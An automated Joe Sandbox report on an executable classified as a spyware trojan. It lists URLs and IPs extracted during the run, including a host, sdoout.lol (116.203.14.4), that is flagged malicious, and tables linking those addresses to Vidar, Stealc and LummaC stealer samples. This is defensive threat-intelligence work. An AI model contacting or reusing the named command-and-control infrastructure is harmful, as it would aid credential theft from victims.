https://google-ohttp-relay-join.fastly-edge.com/9	chrome.exe, 00000011.00000003.2822696005.0000259801954000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2822666939.0000259801950000.00000004.00000800.00020000.00000000.sdmp	false		high
https://deff.nelreports.net/api/report?cat=msn	Reporting and NEL.24.dr	false		high
https://ntp.msn.cn/edge/ntp	2cc80dabc69f58b6_1.23.dr	false		high
https://google-ohttp-relay-join.fastly-edge.com/=	chrome.exe, 00000011.00000003.2822696005.0000259801954000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2822666939.0000259801950000.00000004.00000800.00020000.00000000.sdmp	false		high
https://deff.nelreports.net/api/report	Reporting and NEL.24.dr	false		high
https://publickeyservice.gcp.privacysandboxservices.com	chrome.exe, 00000011.00000003.2819523469.000025980180C000.00000004.00000800.00020000.00000000.sdmp	false		high
http://polymer.github.io/AUTHORS.txt	chrome.exe, 00000011.00000003.2791630004.00002598010B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2793160754.0000259800F6C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2791789034.0000259800F34000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2794096473.000025980120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2791755703.0000259801114000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2793983935.0000259801134000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2791725682.00002598010C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2793760947.0000259800304000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2791843371.00002598010E0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2793563199.0000259800FA8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2793252186.0000259800AD0000.00000004.00000800.00020000.00000000.sdmp	false		high
https://docs.google.com/	chrome.exe, 00000011.00000003.2782341674.000025980049C000.00000004.00000800.00020000.00000000.sdmp, manifest.json0.23.dr	false		high
https://docs.google.com/document/:	chrome.exe, 00000011.00000003.2784272725.000025980099C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://publickeyservice.pa.aws.privacysandboxservices.com	chrome.exe, 00000011.00000003.2819523469.000025980180C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.youtube.com	4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.dr	false		high
https://deff.nelreports.net/api/report?cat=msnw	Reporting and NEL.24.dr	false		high
https://anglebug.com/7714	chrome.exe, 00000011.00000003.2787742349.00002598003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2787775067.0000259800AD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2786900603.00002598003E8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2909001356.000002E400380000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.instagram.com	4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.dr	false		high
https://msn.comXIDv100o	Cookies.24.dr	false	Avira URL Cloud: safe	unknown
https://photos.google.com?referrer=CHROME_NTP	chrome.exe, 00000011.00000003.2794096473.000025980120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2793983935.0000259801134000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2793760947.0000259800304000.00000004.00000800.00020000.00000000.sdmp	false		high
https://drive.google.com/?lfhs=2	chrome.exe, 00000011.00000003.2784272725.000025980099C000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anglebug.com/6248	chrome.exe, 00000011.00000003.2787742349.00002598003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2787775067.0000259800AD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2786900603.00002598003E8000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ogs.google.com/widget/callout?eom=1	chrome.exe, 00000011.00000003.2814425177.0000259801384000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2815198308.0000259801460000.00000004.00000800.00020000.00000000.sdmp	false		high
https://outlook.live.com/mail/inbox?isExtension=true&sharedHeader=1&nlp=1&client_flight=outlookedge	4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.dr	false		high
https://outlook.office.com/mail/compose?isExtension=true	4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.dr	false		high
http://anglebug.com/6929	chrome.exe, 00000011.00000003.2787742349.00002598003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2787775067.0000259800AD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2786900603.00002598003E8000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anglebug.com/5281	chrome.exe, 00000011.00000003.2787742349.00002598003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2787775067.0000259800AD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2786900603.00002598003E8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2909001356.000002E400380000.00000004.00000800.00020000.00000000.sdmp	false		high
https://i.y.qq.com/n2/m/index.html	4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.dr	false		high
https://www.deezer.com/	4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.dr	false		high
https://www.youtube.com/?feature=ytca	chrome.exe, 00000011.00000003.2784272725.000025980099C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://issuetracker.google.com/255411748	chrome.exe, 00000011.00000003.2786900603.00002598003E8000.00000004.00000800.00020000.00000000.sdmp	false		high
https://web.telegram.org/	4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.dr	false		high
https://permanently-removed.invalid/oauth2/v4/token	msedge.exe, 00000015.00000003.2908721230.000002E40026C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2908564343.000002E400268000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2908925216.000002E400270000.00000004.00000800.00020000.00000000.sdmp	false		high
https://anglebug.com/7246	chrome.exe, 00000011.00000003.2787742349.00002598003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2787775067.0000259800AD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2786900603.00002598003E8000.00000004.00000800.00020000.00000000.sdmp	false		high
https://anglebug.com/7369	chrome.exe, 00000011.00000003.2787742349.00002598003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2787775067.0000259800AD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2786900603.00002598003E8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2909001356.000002E400380000.00000004.00000800.00020000.00000000.sdmp	false		high
https://anglebug.com/7489	chrome.exe, 00000011.00000003.2787742349.00002598003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2787775067.0000259800AD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2786900603.00002598003E8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2909001356.000002E400380000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/?q=	chrome.exe, 00000011.00000003.2815410251.0000259800BD8000.00000004.00000800.00020000.00000000.sdmp	false		high
https://chrome.google.com/webstore	chrome.exe, 00000011.00000003.2787695410.0000259800CC8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000002.2987641130.000002E40016C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cdnjs.cloudflare.com/ajax/libs/mathjax/	service_worker_bin_prod.js.23.dr, offscreendocument_main.js.23.dr	false		high
https://drive-daily-2.corp.google.com/	chrome.exe, 00000011.00000003.2782341674.000025980049C000.00000004.00000800.00020000.00000000.sdmp, manifest.json0.23.dr	false		high
http://polymer.github.io/PATENTS.txt	chrome.exe, 00000011.00000003.2791630004.00002598010B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2793160754.0000259800F6C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2791789034.0000259800F34000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2794096473.000025980120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2791755703.0000259801114000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2793983935.0000259801134000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2791725682.00002598010C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2793760947.0000259800304000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2791843371.00002598010E0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2793563199.0000259800FA8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2793252186.0000259800AD0000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	Web Data.23.dr, lxlxt0.13.dr, 6xlx4w.13.dr	false		high
http://www.autoitscript.com/autoit3/X	Evans.com, 0000000D.00000000.2217338938.0000000000B95000.00000002.00000001.01000000.00000007.sdmp, Evans.com.2.dr, Entities.9.dr	false		high
https://issuetracker.google.com/161903006	chrome.exe, 00000011.00000003.2786900603.00002598003E8000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.ecosia.org/newtab/	lxlxt0.13.dr	false		high
https://drive-daily-1.corp.google.com/	chrome.exe, 00000011.00000003.2782341674.000025980049C000.00000004.00000800.00020000.00000000.sdmp, manifest.json0.23.dr	false		high
https://excel.new?from=EdgeM365Shoreline	4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.dr	false		high
https://drive-daily-5.corp.google.com/	chrome.exe, 00000011.00000003.2782341674.000025980049C000.00000004.00000800.00020000.00000000.sdmp, manifest.json0.23.dr	false		high
https://duckduckgo.com/favicon.ico	chrome.exe, 00000011.00000003.2793657944.0000259800BD8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2788298037.0000259800BDC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2814485401.0000259800BDC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2815410251.0000259800BD8000.00000004.00000800.00020000.00000000.sdmp	false		high
https://plus.google.com	chromecache_473.19.dr	false		high
https://permanently-removed.invalid/chrome/blank.html	msedge.exe, 00000015.00000003.2908721230.000002E40026C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2908564343.000002E400268000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2908925216.000002E400270000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anglebug.com/3078	chrome.exe, 00000011.00000003.2787742349.00002598003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2787775067.0000259800AD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2786900603.00002598003E8000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anglebug.com/7553	chrome.exe, 00000011.00000003.2787742349.00002598003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2787775067.0000259800AD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2786900603.00002598003E8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2909001356.000002E400380000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anglebug.com/5375	chrome.exe, 00000011.00000003.2787742349.00002598003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2787775067.0000259800AD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2786900603.00002598003E8000.00000004.00000800.00020000.00000000.sdmp	false		high
https://bzib.nelreports.net/api/report?cat=bingbusiness	Reporting and NEL.24.dr	false		high
https://permanently-removed.invalid/v1/issuetoken	msedge.exe, 00000015.00000003.2908721230.000002E40026C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2908564343.000002E400268000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2908925216.000002E400270000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.youtube.com/s/notifications/manifest/cr_install.htmllt	chrome.exe, 00000011.00000003.2819894241.000025980129C000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anglebug.com/5371	chrome.exe, 00000011.00000003.2787742349.00002598003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2787775067.0000259800AD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2786900603.00002598003E8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2909001356.000002E400380000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anglebug.com/4722	chrome.exe, 00000011.00000003.2787742349.00002598003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2787775067.0000259800AD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2786900603.00002598003E8000.00000004.00000800.00020000.00000000.sdmp	false		high
https://permanently-removed.invalid/reauth/v1beta/users/	msedge.exe, 00000015.00000003.2908721230.000002E40026C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2908564343.000002E400268000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2908925216.000002E400270000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anglebug.com/7556	chrome.exe, 00000011.00000003.2787742349.00002598003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2787775067.0000259800AD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2786900603.00002598003E8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2909001356.000002E400380000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref	aieukn.13.dr	false		high
https://chromewebstore.google.com/	msedge.exe, 00000015.00000002.2987641130.000002E40016C000.00000004.00000800.00020000.00000000.sdmp, manifest.json.23.dr	false		high
https://drive-preprod.corp.google.com/	chrome.exe, 00000011.00000003.2782341674.000025980049C000.00000004.00000800.00020000.00000000.sdmp, manifest.json0.23.dr	false		high
https://srtb.msn.cn/	2cc80dabc69f58b6_1.23.dr	false		high
https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477	aieukn.13.dr	false		high
https://chrome.google.com/webstore/	manifest.json.23.dr	false		high
https://assets.msn.cn/resolver/	2cc80dabc69f58b6_1.23.dr	false		high
https://publickeyservice.pa.gcp.privacysandboxservices.com	chrome.exe, 00000011.00000003.2819523469.000025980180C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://google-ohttp-relay-join.fastly-edge.com/&	chrome.exe, 00000011.00000003.2822696005.0000259801954000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2822666939.0000259801950000.00000004.00000800.00020000.00000000.sdmp	false		high
https://google-ohttp-relay-join.fastly-edge.com/%	chrome.exe, 00000011.00000003.2822696005.0000259801954000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2822666939.0000259801950000.00000004.00000800.00020000.00000000.sdmp	false		high
https://browser.events.data.msn.com/	2cc80dabc69f58b6_1.23.dr	false		high
https://permanently-removed.invalid/RotateBoundCookies	msedge.exe, 00000015.00000003.2908721230.000002E40026C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2908564343.000002E400268000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2908925216.000002E400270000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anglebug.com/6692	chrome.exe, 00000011.00000003.2787742349.00002598003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2787775067.0000259800AD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2786900603.00002598003E8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2909001356.000002E400380000.00000004.00000800.00020000.00000000.sdmp	false		high
https://issuetracker.google.com/258207403	chrome.exe, 00000011.00000003.2786900603.00002598003E8000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anglebug.com/3502	chrome.exe, 00000011.00000003.2787742349.00002598003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2787775067.0000259800AD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2786900603.00002598003E8000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anglebug.com/3623	chrome.exe, 00000011.00000003.2786900603.00002598003E8000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.office.com	4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.dr	false		high
http://anglebug.com/3625	chrome.exe, 00000011.00000003.2786900603.00002598003E8000.00000004.00000800.00020000.00000000.sdmp	false		high
https://outlook.live.com/mail/0/	4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.dr	false		high
http://anglebug.com/3624	chrome.exe, 00000011.00000003.2786900603.00002598003E8000.00000004.00000800.00020000.00000000.sdmp	false		high
https://docs.google.com/presentation/J	chrome.exe, 00000011.00000003.2784272725.000025980099C000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anglebug.com/5007	chrome.exe, 00000011.00000003.2787742349.00002598003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2787775067.0000259800AD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2786900603.00002598003E8000.00000004.00000800.00020000.00000000.sdmp	false		high
https://drive.google.com/drive/installwebapp?usp=chrome_default	chrome.exe, 00000011.00000003.2784272725.000025980099C000.00000004.00000800.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
23.44.201.17	unknown	United States	20940	AKAMAI-ASN1EU	false
162.159.61.3	chrome.cloudflare-dns.com	United States	13335	CLOUDFLARENETUS	false
108.139.47.92	unknown	United States	16509	AMAZON-02US	false
20.110.205.119	unknown	United States	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
18.244.18.38	sb.scorecardresearch.com	United States	16509	AMAZON-02US	false
216.58.206.46	plus.l.google.com	United States	15169	GOOGLEUS	false
239.255.255.250	unknown	Reserved	unknown	unknown	false
142.250.186.46	play.google.com	United States	15169	GOOGLEUS	false
116.203.14.4	sdoout.lol	Germany	24940	HETZNER-ASDE	true
149.154.167.99	t.me	United Kingdom	62041	TELEGRAMRU	false
13.69.239.77	unknown	United States	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
204.79.197.219	unknown	United States	8068	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
172.64.41.3	unknown	United States	13335	CLOUDFLARENETUS	false
23.44.201.43	unknown	United States	20940	AKAMAI-ASN1EU	false
23.209.72.8	unknown	United States	20940	AKAMAI-ASN1EU	false
172.217.16.129	googlehosted.l.googleusercontent.com	United States	15169	GOOGLEUS	false
142.250.186.164	www.google.com	United States	15169	GOOGLEUS	false

Private

IP
192.168.2.5
127.0.0.1

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1582695
Start date and time:	2024-12-31 09:44:07 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 8m 2s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	33
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	6684V5n83w.exe renamed because original name is a hash value
Original Sample Name:	53c60d599aa498ed4efa79ba0b12e29f.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@91/294@29/19
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 100% Number of executed functions: 37 Number of non-executed functions: 36
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, RuntimeBroker.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 192.229.221.95, 199.232.214.172, 172.217.18.99, 142.250.185.174, 74.125.133.84, 142.250.181.238, 142.250.185.78, 142.250.186.67, 142.250.186.78, 142.250.184.202, 216.58.212.138, 172.217.18.106, 216.58.206.42, 142.250.181.234, 142.250.185.74, 216.58.206.74, 142.250.186.170, 142.250.185.106, 142.250.185.202, 142.250.186.74, 142.250.185.138, 142.250.185.234, 142.250.185.170, 216.58.212.170, 142.250.184.234, 142.250.74.202, 172.217.18.10, 172.217.23.106, 142.250.186.138, 142.250.186.42, 142.250.186.106, 172.217.16.202, 13.107.42.16, 204.79.197.203, 204.79.197.239, 13.107.21.239, 142.250.185.110, 13.107.6.158, 2.16.168.107, 2.16.168.113, 4.231.68.226, 88.221.110.179, 88.221.110.195, 2.23.209.165, 2.23.209.130, 2.23.209.177, 2.23.209.148, 2.23.209.150, 2.23.209.140, 2.23.209.179, 2.23.209.133, 2.23.209.176, 2.23.209.185, 2.23.209.189, 2.23.209.182, 204.79.197.237, 13.107.21.237, 13.74.129.1, 2.23.209.52, 2.23.209.8, 2.23.209.48, 2.23.209.45, 2.23.209.55, 2.23.209.59, 2.23.2
Excluded domains from analysis (whitelisted): cdp-f-ssl-tlu-net.trafficmanager.net, nav-edge.smartscreen.microsoft.com, slscr.update.microsoft.com, a416.dscd.akamai.net, img-s-msn-com.akamaized.net, data-edge.smartscreen.microsoft.com, clientservices.googleapis.com, edgeassetservice.afd.azureedge.net, star.sf.tlu.dl.delivery.mp.microsoft.com.delivery.microsoft.com, clients2.google.com, e86303.dscx.akamaiedge.net, ocsp.digicert.com, config-edge-skype.l-0007.l-msedge.net, login.live.com, www.gstatic.com, prod-agic-ne-9.northeurope.cloudapp.azure.com, l-0007.l-msedge.net, e28578.d.akamaiedge.net, www.bing.com, assets.msn.com.edgekey.net, fs.microsoft.com, bingadsedgeextension-prod.trafficmanager.net, c-bing-com.dual-a-0034.a-msedge.net, ogads-pa.googleapis.com, prod-atm-wds-edge.trafficmanager.net, www-www.bing.com.trafficmanager.net, business-bing-com.b-0005.b-msedge.net, a1834.dscg2.akamai.net, prod-agic-we-8.westeurope.cloudapp.azure.com, c.bing.com, edgeassetservice.azureedge.net, clients.l.google.com, confi
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtCreateFile calls found.
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtSetInformationFile calls found.
Report size getting too big, too many NtWriteFile calls found.
Report size getting too big, too many NtWriteVirtualMemory calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: 6684V5n83w.exe

Simulations

Behavior and APIs

Time	Type	Description
03:45:12	API Interceptor	1x Sleep call for process: 6684V5n83w.exe modified
03:45:16	API Interceptor	16x Sleep call for process: Evans.com modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
162.159.61.3	BHgwhz3lGN.exe	Get hash	malicious	Vidar	Browse
	sysmonconfig.xml	Get hash	malicious	Unknown	Browse
	Tool_Unlock_v1.2.exe	Get hash	malicious	Vidar	Browse
	FLKCAS1DzH.bat	Get hash	malicious	Unknown	Browse
	T4qO1i2Jav.exe	Get hash	malicious	LummaC Stealer	Browse
	aD7D9fkpII.exe	Get hash	malicious	Vidar	Browse
	installer.bat	Get hash	malicious	Vidar	Browse
	skript.bat	Get hash	malicious	Vidar	Browse
	lem.exe	Get hash	malicious	Vidar	Browse
	HVlonDQpuI.exe	Get hash	malicious	Vidar	Browse
108.139.47.92	JA7cOAGHym.exe	Get hash	malicious	Vidar	Browse
	trZG6pItZj.exe	Get hash	malicious	Vidar	Browse
	ktyihkdfesf.exe	Get hash	malicious	Vidar	Browse
	file.exe	Get hash	malicious	Vidar	Browse
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	PureCrypter, Amadey, Cerbfyne Stealer, Credential Flusher, Cryptbot, LummaC Stealer, Poverty Stealer	Browse
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Amadey, Stealc, Vidar	Browse
	JHPvqMzKbz.exe	Get hash	malicious	Vidar	Browse
	https://praviplastics.com/o/?c3Y9bzM2NV8xX3ZvaWNlJnJhbmQ9YW01cVRWST0mdWlkPVVTRVIxMjA5MjAyNFU0ODA5MTI1OQ==#j.pullen@newheycarpets.co.uk	Get hash	malicious	Unknown	Browse
23.44.201.17	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse
	https://nimblethumb.world/ad88e0364e2c172b62811cb705409770	Get hash	malicious	Unknown	Browse
20.110.205.119	BHgwhz3lGN.exe	Get hash	malicious	Vidar	Browse
	Tool_Unlock_v1.2.exe	Get hash	malicious	Vidar	Browse
	JA7cOAGHym.exe	Get hash	malicious	Vidar	Browse
	aD7D9fkpII.exe	Get hash	malicious	Vidar	Browse
	installer.bat	Get hash	malicious	Vidar	Browse
	din.exe	Get hash	malicious	Vidar	Browse
	lem.exe	Get hash	malicious	Vidar	Browse
	HVlonDQpuI.exe	Get hash	malicious	Vidar	Browse
	PodcastsTries.exe	Get hash	malicious	Vidar	Browse
	ChoForgot.exe	Get hash	malicious	Vidar	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
t.me	BHgwhz3lGN.exe	Get hash	malicious	Vidar	Browse	149.154.167.99
	Tool_Unlock_v1.2.exe	Get hash	malicious	Vidar	Browse	149.154.167.99
	JA7cOAGHym.exe	Get hash	malicious	Vidar	Browse	149.154.167.99
	https://linkenbio.net/59125/247	Get hash	malicious	Unknown	Browse	149.154.167.99
	aD7D9fkpII.exe	Get hash	malicious	Vidar	Browse	149.154.167.99
	installer.bat	Get hash	malicious	Vidar	Browse	149.154.167.99
	skript.bat	Get hash	malicious	Vidar	Browse	149.154.167.99
	din.exe	Get hash	malicious	Vidar	Browse	149.154.167.99
	yoda.exe	Get hash	malicious	Vidar	Browse	149.154.167.99
	lem.exe	Get hash	malicious	Vidar	Browse	149.154.167.99
chrome.cloudflare-dns.com	BHgwhz3lGN.exe	Get hash	malicious	Vidar	Browse	172.64.41.3
	sysmonconfig.xml	Get hash	malicious	Unknown	Browse	172.64.41.3
	Tool_Unlock_v1.2.exe	Get hash	malicious	Vidar	Browse	172.64.41.3
	FLKCAS1DzH.bat	Get hash	malicious	Unknown	Browse	172.64.41.3
	JA7cOAGHym.exe	Get hash	malicious	Vidar	Browse	172.64.41.3
	T4qO1i2Jav.exe	Get hash	malicious	LummaC Stealer	Browse	172.64.41.3
	aD7D9fkpII.exe	Get hash	malicious	Vidar	Browse	172.64.41.3
	installer.bat	Get hash	malicious	Vidar	Browse	172.64.41.3
	skript.bat	Get hash	malicious	Vidar	Browse	162.159.61.3
	din.exe	Get hash	malicious	Vidar	Browse	172.64.41.3
sdoout.lol	BHgwhz3lGN.exe	Get hash	malicious	Vidar	Browse	116.203.14.4
ssl.bingadsedgeextension-prod-europe.azurewebsites.net	BHgwhz3lGN.exe	Get hash	malicious	Vidar	Browse	94.245.104.56
	Tool_Unlock_v1.2.exe	Get hash	malicious	Vidar	Browse	94.245.104.56
	JA7cOAGHym.exe	Get hash	malicious	Vidar	Browse	94.245.104.56
	aD7D9fkpII.exe	Get hash	malicious	Vidar	Browse	94.245.104.56
	installer.bat	Get hash	malicious	Vidar	Browse	94.245.104.56
	skript.bat	Get hash	malicious	Vidar	Browse	94.245.104.56
	din.exe	Get hash	malicious	Vidar	Browse	94.245.104.56
	lem.exe	Get hash	malicious	Vidar	Browse	94.245.104.56
	HVlonDQpuI.exe	Get hash	malicious	Vidar	Browse	94.245.104.56
	PodcastsTries.exe	Get hash	malicious	Vidar	Browse	94.245.104.56

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
AMAZON-02US	PO_2024_056209_MQ04865_ENQ_1045.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	18.141.10.107
	25F.tmp.exe	Get hash	malicious	Darkbot	Browse	18.244.18.38
	chernobyl.arm7.elf	Get hash	malicious	Gafgyt, Mirai	Browse	54.171.230.55
	DIS_37745672.pdf	Get hash	malicious	KnowBe4, PDFPhish	Browse	34.241.139.243
